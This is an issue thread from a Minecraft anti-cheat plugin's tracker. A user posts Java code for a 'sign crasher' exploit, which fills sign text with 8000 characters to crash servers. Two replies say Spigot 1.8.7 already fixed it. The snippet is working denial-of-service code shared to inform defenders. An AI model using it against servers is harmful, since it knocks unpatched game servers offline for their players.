### ISSUE TITLE
Sign-Crasher

### ISSUE THREAD

**Issue by byCaptain** [konsolas/AAC-Issues#647]
private void fillCrashChars()
  {
    setCrashChars("");
    for (int i = 0; i < 8000; i++) {
      this.crashChars += "?";
    }
    setLines(new IChatComponent[4]);
    for (int i = 0; i < 4; i++)
    {
      IChatComponent ichatcomponent = IChatComponent.Serializer.jsonToComponent(this.crashChars);
      this.lines[i] = ichatcomponent;
    }
  }

just to prevent other users, who dont know

**Comment by Eyremba** [comment]
Dude SignCrashers are fixed by SpigotMC itself, just update to at least 1.8.7.

There is no need for such a check in AAC.

**Comment by konsolas** [comment]
Fixed in spigot.
